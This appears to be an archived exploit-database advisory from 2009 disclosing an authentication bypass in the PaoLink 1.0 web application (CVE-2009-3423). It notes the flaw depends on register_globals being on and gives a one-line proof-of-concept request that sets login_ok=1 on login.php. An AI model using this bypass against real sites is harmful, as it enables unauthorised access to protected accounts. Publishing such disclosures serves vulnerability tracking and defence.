PaoLink 1.0 - 'login_ok' Authentication Bypass

EKU-ID: 17068	CVE: OSVDB-56756;CVE-2009-3423	OSVDB-ID:
Author: SirGod	Published: 2009-07-28	Verified:
Download:

Rating

☆☆☆☆☆

#############################################################################
[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################

download : http://zenas.org/paobacheca/download/scarica.html

[+] Authentication Bypass Vulnerability


 - Notes : register_globals = on


 - PoC :

     http://127.0.0.1/[path]/login.php?login_ok=1

#############################################################################

# milw0rm.com [2009-07-28]